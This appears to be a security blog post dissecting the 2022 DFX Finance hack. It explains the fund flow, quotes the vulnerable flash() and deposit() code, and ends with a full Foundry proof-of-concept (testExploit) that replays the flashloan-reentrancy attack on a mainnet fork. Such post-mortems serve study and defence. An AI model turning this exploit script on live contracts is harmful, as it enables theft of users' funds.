03.DFX Finance @Reentrancy@flashloan
2023-07-15 20:20:56 # 08.PoC

DFX Finance @Reentrancy@flashloan

KEY WORDS: flashloan, reentrancy

ATTACK TIME: 2022.11.11

LOSSES:4 million$

Event Background

DFX is an Ethereum-based decentralized exchange protocol with a dynamically tuned bonding curve optimized for fiat-backed stablecoins (like USDC, CADC, EURS, XSGD, etc) using real-world FX price feeds.

Tx Details

  • one of attack txs

    • hacker contract: 0x6cfa86a352339e766ff1ca119c8c40824f41f22d

    • dfx-xidr-v2 contract: 0x46161158b1947d9149e066d6d31af1283b2d377c

  • fund change

  • 0x27e843260c71443b4cc8cb6bf226c3f77b9695af: it is a multi wallet that receives fee with the flashloan().

  • fund flow
    • [1] [2]: hacker borrowed a lot of USDC and XIDR from dfx
    • [3] [4]: hacker paid back USDC and XIDR to dfx
    • [5] : token dfx-xidr-v2 was minted to hacker
    • [6] [7] : DFX multi wallet receives some USDC and XIDR as fee of flashloan()
    • [8] : hacker burned token dfx-xidr-v2

Attack Process

The entire attack process

1.preparation

why hacker called viewDeposit()?

Hacker wanted to know how much token pair he should deposit to get 200,000*1e18 token dfx-xidr-v2

1
2
3
4
5
6
7
8
9
/// @notice view deposits and curves minted a given deposit would return
/// @param _deposit the full amount of stablecoins you want to deposit. Divided evenly according to the
/// prevailing proportions of the numeraire assets of the pool
/// @return (the amount of curves you receive in return for your deposit,
/// the amount deposited for each numeraire)
function viewDeposit(uint256 _deposit) external view transactable returns (uint256, uint256[] memory) {
// curvesToMint_, depositsToMake_
return ProportionalLiquidity.viewProportionalDeposit(curve, _deposit);
}

2.flashloan

in flash() we know it is similar to uniswapV2’s flashloan()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
function flash(
address recipient,
uint256 amount0,
uint256 amount1,
bytes calldata data
) external transactable noDelegateCall isNotEmergency {
uint256 fee = curve.epsilon.mulu(1e18);

require(IERC20(derivatives[0]).balanceOf(address(this)) > 0, 'Curve/token0-zero-liquidity-depth');
require(IERC20(derivatives[1]).balanceOf(address(this)) > 0, 'Curve/token1-zero-liquidity-depth');

// calculate the fee and money
uint256 fee0 = FullMath.mulDivRoundingUp(amount0, fee, 1e18);
uint256 fee1 = FullMath.mulDivRoundingUp(amount1, fee, 1e18);
uint256 balance0Before = IERC20(derivatives[0]).balanceOf(address(this));
uint256 balance1Before = IERC20(derivatives[1]).balanceOf(address(this));

// lend money
if (amount0 > 0) IERC20(derivatives[0]).safeTransfer(recipient, amount0);
if (amount1 > 0) IERC20(derivatives[1]).safeTransfer(recipient, amount1);

// fallabck
IFlashCallback(msg.sender).flashCallback(fee0, fee1, data);

uint256 balance0After = IERC20(derivatives[0]).balanceOf(address(this));
uint256 balance1After = IERC20(derivatives[1]).balanceOf(address(this));

// check the balance
require(balance0Before.add(fee0) <= balance0After, 'Curve/insufficient-token0-returned');
require(balance1Before.add(fee1) <= balance1After, 'Curve/insufficient-token1-returned');

// sub is safe because we know balanceAfter is gt balanceBefore by at least fee
uint256 paid0 = balance0After - balance0Before;
uint256 paid1 = balance1After - balance1Before;

IERC20(derivatives[0]).safeTransfer(owner, paid0);
IERC20(derivatives[1]).safeTransfer(owner, paid1);

emit Flash(msg.sender, recipient, amount0, amount1, paid0, paid1);
}

3.pay back for flashloan

4.flashCallBack

deposit():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/// @notice deposit into the pool with no slippage from the numeraire assets the pool supports
/// @param _deposit the full amount you want to deposit into the pool which will be divided up evenly amongst
/// the numeraire assets of the pool
/// @return (the amount of curves you receive in return for your deposit,
/// the amount deposited for each numeraire)
function deposit(uint256 _deposit, uint256 _deadline)
external
deadline(_deadline)
transactable
nonReentrant
noDelegateCall
notInWhitelistingStage
isNotEmergency
returns (uint256, uint256[] memory)
{
// (curvesMinted_, deposits_)
return ProportionalLiquidity.proportionalDeposit(curve, _deposit);
}

Hacker deposited USDC and XIDR that he got in flashloan to mint token dfx-xidr-usdc. Attention, hacker did deposit meaned that contract dfx-xidr-usdc would receive this USDC and XIDR, resulting at pass these checking:

1
2
require(balance0Before.add(fee0) <= balance0After, 'Curve/insufficient-token0-returned');
require(balance1Before.add(fee1) <= balance1After, 'Curve/insufficient-token1-returned');

5.withdraw&exploit

Vulnerability Analysis

attack logic is the same as Damn Vulnerable DeFi CTF’s Side Entrance.

Attack Recurrence

GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

// @KeyInfo

// key words: @flashloan @reentrancy
// date: 2022.11.11
// total Lost: 4 million$
// network: Mainnet
// Attacker:
// Attack Contract: 0x6cfa86a352339e766ff1ca119c8c40824f41f22d
// Vulnerable Contract: 0x46161158b1947d9149e066d6d31af1283b2d377c
// Attack Tx: 0x6bfd9e286e37061ed279e4f139fbc03c8bd707a2cdd15f7260549052cbba79b7

// @Info
// Vulnerable Contract Code : 0x46161158b1947d9149e066d6d31af1283b2d377c

// @Analysis
// blog: https://www.levi104.com/2023/07/15/08.PoC/03.DFX%20Finance%20@Reentrancy@flashloan/


contract DFXTest is DSTest{
IERC20 XIDR = IERC20(0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52);
IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
Uni_Router_V3 Router = Uni_Router_V3(0xE592427A0AEce92De3Edee1F18E0157C05861564);
Curve dfx = Curve(0x46161158b1947D9149E066d6d31AF1283b2d377C);
uint256 receiption;

CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

function setUp() public {
cheats.createSelectFork("mainnet", 15941703);
}

function testExploit() public{
address(WETH).call{value: 2 ether}("");
WETH.approve(address(Router), type(uint).max);
USDC.approve(address(Router), type(uint).max);
USDC.approve(address(dfx), type(uint).max);
XIDR.approve(address(Router), type(uint).max);
XIDR.approve(address(dfx), type(uint).max);

WETHToUSDC();

emit log_named_decimal_uint(
"[Before] Attacker USDC balance before exploit",
USDC.balanceOf(address(this)),
6
);

USDCToXIDR();
uint[] memory XIDR_USDC = new uint[](2);
XIDR_USDC[0] = 0;
XIDR_USDC[1] = 0;
( , XIDR_USDC) = dfx.viewDeposit(200_000 * 1e18);
dfx.flash(address(this), XIDR_USDC[0] * 995 / 1000, XIDR_USDC[1] * 995 / 1000, new bytes(1)); // 5% fee
dfx.withdraw(receiption, block.timestamp + 60);
XIDRToUSDC();

emit log_named_decimal_uint(
"[End] Attacker USDC balance after exploit",
USDC.balanceOf(address(this)),
6
);

}

function flashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external{
(receiption, ) = dfx.deposit(200_000 * 1e18, block.timestamp + 60);
}

function WETHToUSDC() internal{
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(WETH),
tokenOut: address(USDC),
fee: 500,
recipient: address(this),
deadline: block.timestamp,
amountIn: WETH.balanceOf(address(this)),
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
Router.exactInputSingle(_Params);
}

function USDCToXIDR() internal{
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(USDC),
tokenOut: address(XIDR),
fee: 500,
recipient: address(this),
deadline: block.timestamp,
amountIn: USDC.balanceOf(address(this)) / 2,
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
Router.exactInputSingle(_Params);
}

function XIDRToUSDC() internal{
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(XIDR),
tokenOut: address(USDC),
fee: 500,
recipient: address(this),
deadline: block.timestamp,
amountIn: XIDR.balanceOf(address(this)) / 2,
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
Router.exactInputSingle(_Params);
}

}

Remediation

fixed flashloan() checking logic

Prev
2023-07-15 20:20:56 # 08.PoC
Next